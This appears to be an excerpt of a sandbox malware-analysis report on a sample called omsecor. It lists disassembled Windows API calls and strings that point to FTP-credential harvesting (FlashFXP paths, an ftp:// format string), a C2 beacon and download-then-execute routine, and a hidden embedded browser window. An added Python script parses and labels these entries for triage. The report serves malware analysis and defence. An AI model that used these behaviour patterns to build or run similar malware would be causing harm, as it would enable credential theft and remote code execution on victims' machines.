• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Open$CloseQueryValue
• String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
• API String ID: 3546245721-1332223170
• Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
• Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
• Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
• Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
APIs
• SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
• SetParent.USER32(00000000,00000000), ref: 0040A1E2
• GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
• SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
• SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
  • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
  • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
  • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
• String ID: Shell_TrayWnd$eventConn
• API String ID: 2141107913-3455059086
• Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
• Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
• Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
• Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
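Three of the call chains above carry most of the behavioural signal in this section once the Win32 constants are decoded: the routine at 00407043 (DeleteFileW, CreateFileW with GENERIC_WRITE and OPEN_ALWAYS, then InternetOpenUrlW), the routine at 00406B2A (RegOpenKeyExW on HKEY_LOCAL_MACHINE paired with the SOFTWARE\Classes\MIME\Database\Content Type\ string), and the routine at 0040A18D (FindWindowW on Shell_TrayWnd, SetParent, SetWindowLongW, SetWindowPos to coordinates 5000,5000, with a subcall that creates an AtlAxWin window hosting Shell.Explorer). The Python script below is an added triage example and is not code from the Joe Sandbox report or its IDA plugin. It parses API lines in the format the report uses (the embedded sample is a constructed copy of those three entries), decodes the arguments whose meaning is fixed by the Win32 API, and flags the three behaviours. The behaviour labels, the off-screen threshold and the reading of the 0xEC window-long index as a byte-truncated rendering of GWL_EXSTYLE (-20) are this example's own assumptions, not findings stated by the report.

```python
"""Decode Joe Sandbox 'APIs' entries and flag behaviour patterns (added example)."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: API and String ID lines of three function entries from this
# report, copied in the report's own list format (the "APIs" header starts an entry).
SAMPLE = """\
APIs
• DeleteFileW.KERNEL32(00000000,76230F00), ref: 00407043
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
• GetLastError.KERNEL32(00000000), ref: 00407079
• SetEndOfFile.KERNEL32(00000000), ref: 0040708F
• InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
• CloseHandle.KERNEL32(00000000), ref: 004070BB
• String ID:
APIs
• RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
  • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
• String ID: CLSID$SOFTWARE\\Classes\\MIME\\Database\\Content Type\\$application/x-javascript$text/html$text/javascript
APIs
• SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
• SetParent.USER32(00000000,00000000), ref: 0040A1E2
• GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
• SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
• SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
  • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
• String ID: Shell_TrayWnd$eventConn
"""

CALL_RE = re.compile(
    r"^(?P<sub>Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)$"
)

# Win32 constants whose meaning is fixed by the API documentation.
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0xC0000000: "GENERIC_READ|GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
OFFSCREEN_PX = 0x1000  # heuristic threshold for "placed far outside any normal display"


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str
    subcall: bool


@dataclass
class Entry:
    calls: list[Call] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)


def hexval(arg: str) -> int | None:
    """Parse a hex argument as rendered by the report; '?' and symbolic args give None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_entries(text: str) -> list[Entry]:
    """Split report text into function entries; each 'APIs' header opens a new one."""
    entries: list[Entry] = []
    cur: Entry | None = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if line == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("String ID:"):
            cur.strings = [s for s in line[len("String ID:"):].strip().split("$") if s]
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")]
            cur.calls.append(Call(m["api"], m["mod"], args, m["ref"], m["sub"] is not None))
    return entries


def decode(call: Call) -> list[str]:
    """Human-readable notes for arguments with a fixed Win32 meaning."""
    def v(i: int) -> int | None:
        return hexval(call.args[i]) if i < len(call.args) else None

    notes: list[str] = []
    if call.api == "RegOpenKeyExW" and v(0) in HKEY:
        notes.append(f"hKey={HKEY[v(0)]}")
    elif call.api == "CreateFileW":
        if v(1) in ACCESS:
            notes.append(f"dwDesiredAccess={ACCESS[v(1)]}")
        if v(4) in DISPOSITION:
            notes.append(f"dwCreationDisposition={DISPOSITION[v(4)]}")
    elif call.api in ("GetWindowLongW", "SetWindowLongW") and v(1) == 0xEC:
        # Assumption: the report renders the index as a byte; GWL_EXSTYLE is -20 = 0xFFFFFFEC.
        notes.append("nIndex=0xEC (low byte of GWL_EXSTYLE, assumed truncated)")
    elif call.api == "SetWindowPos" and v(2) is not None and v(3) is not None:
        off = " (off-screen by heuristic)" if v(2) >= OFFSCREEN_PX or v(3) >= OFFSCREEN_PX else ""
        notes.append(f"X={v(2)},Y={v(3)}{off}")
    elif call.api == "CreateWindowExW" and len(call.args) >= 4:
        if v(3) is not None and v(3) & 0x80000000:
            notes.append("dwStyle includes WS_POPUP")
        notes.append(f"class={call.args[1]},title={call.args[2]}")
    return notes


def classify(entry: Entry) -> list[str]:
    """Behaviour labels (this example's own heuristics) for one function entry."""
    apis = {c.api for c in entry.calls}
    findings: list[str] = []
    writes_file = any(c.api == "CreateFileW" and len(c.args) > 1
                      and hexval(c.args[1]) in (0x40000000, 0xC0000000) for c in entry.calls)
    if writes_file and "InternetOpenUrlW" in apis:
        findings.append("opens a URL and writes it into a freshly created local file (download routine)")
    finds_tray = any(c.api == "FindWindowW" and "Shell_TrayWnd" in c.args for c in entry.calls)
    if finds_tray and {"SetParent", "SetWindowLongW"} <= apis:
        label = "re-parents a window under the taskbar (Shell_TrayWnd) and rewrites its styles (concealed window)"
        if any(c.api == "CreateWindowExW" and "Shell.Explorer" in c.args for c in entry.calls):
            label += "; subcall creates an AtlAxWin hosting Shell.Explorer (hidden browser control)"
        findings.append(label)
    opens_hklm = any(c.api == "RegOpenKeyExW" and hexval(c.args[0]) == 0x80000002 for c in entry.calls)
    if opens_hklm and any(s.startswith("SOFTWARE\\Classes\\MIME") for s in entry.strings):
        findings.append("resolves MIME content-type handler CLSIDs under HKLM (consistent with rendering html/javascript in-process)")
    return findings


def triage(text: str) -> list[tuple[str, list[str], list[str]]]:
    """Per entry: address of its first call, decoded argument notes, behaviour labels."""
    out = []
    for e in parse_entries(text):
        notes = [f"{c.api}@{c.ref}: {', '.join(decode(c))}" for c in e.calls if decode(c)]
        out.append((e.calls[0].ref if e.calls else "?", notes, classify(e)))
    return out


if __name__ == "__main__":
    for ref, notes, labels in triage(SAMPLE):
        print(f"function entry starting at {ref}")
        for n in notes:
            print("  " + n)
        for l in labels:
            print("  => " + l)
```

The parser keys on the report's own layout (an "APIs" header per function, "Part of subcall function" lines indented beneath it, and the "String ID" line of the same entry), so the whole disassembly section can be pasted in rather than the three entries embedded here; the labels are only as good as the constant tables, and arguments shown as "?" are skipped rather than guessed.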
APIs
  • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
• HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
• StrStrIA.SHLWAPI(?,?), ref: 00404913
• StrStrIA.SHLWAPI(?,?), ref: 00404925
• StrStrIA.SHLWAPI(?,?), ref: 00404935
• StrStrIA.SHLWAPI(?,?), ref: 00404947
  • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
  • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
  • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
  • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
  • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
  • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                                                                                                                                                                                                                • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                                                                                                                                                                                                                • API String ID: 1635188419-1322549247
                                                                                                                                                                                                                • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                                • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
APIs
• CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
• GetLocalTime.KERNEL32(?), ref: 00407387
• GetLocalTime.KERNEL32(?), ref: 0040738D
• GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
• SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
• SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
• SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
• WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
• CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
• String ID:
• API String ID: 3166187867-0
• Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
• Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
• Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
• Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID:
• String ID: http$+@
• API String ID: 0-4127549746
• Opcode ID: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
• Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
• Opcode Fuzzy Hash: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
• Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
APIs
  • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
• ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
• SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: EnvironmentExpandFolderOpenPathStrings
• String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
• API String ID: 1994525040-4055253781
• Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
• Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
• Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
• Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
APIs
• SysAllocString.OLEAUT32(?), ref: 004099EB
• SysAllocString.OLEAUT32(?), ref: 004099F9
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: AllocString
• String ID: </domain>$</url>$<domain>$<url>$http://
• API String ID: 2525500382-924421446
• Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
• Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
• Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
• Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
APIs
• SysFreeString.OLEAUT32(7644F6A0), ref: 00408F82
• SysFreeString.OLEAUT32(0000000B), ref: 00409046
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
Similarity
• API ID: FreeString
• String ID:
• API String ID: 3341692771-0
• Opcode ID: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
• Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
• Opcode Fuzzy Hash: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
• Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
APIs
  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
• Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
• Sleep.KERNEL32(0000EA60), ref: 0040AD76
• Sleep.KERNEL32(00002710), ref: 0040ADA4
Strings
Memory Dump Source
• Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$AttemptConnectInternet
                                                                                                                                                                                                                • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                                                                                                                                                                                                                • API String ID: 362191241-2593661552
                                                                                                                                                                                                                • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                                                                                                                                                                                                                • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                                                                                                                                                                                                                • __FindPESection.LIBCMT ref: 0040D8AC
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 876702719-0
                                                                                                                                                                                                                • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                                • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004088E4
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004088E9
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089D3
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089D8
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004089F3
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID: +@
                                                                                                                                                                                                                • API String ID: 3341692771-3835504741
                                                                                                                                                                                                                • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                                • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                                                                                                                                                                                                                • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • _memset.LIBCMT ref: 004025DA
                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                                                                                                                                                                                                                • String ID: none
                                                                                                                                                                                                                • API String ID: 2353737338-2140143823
                                                                                                                                                                                                                • Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                                                                                                                                                                                                                • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 004094E6
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FreeString
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3341692771-0
                                                                                                                                                                                                                • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                                • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _memset.LIBCMT ref: 0040A26B
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040A28E
                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040A296
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                                                                                                                                                                                                                  • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
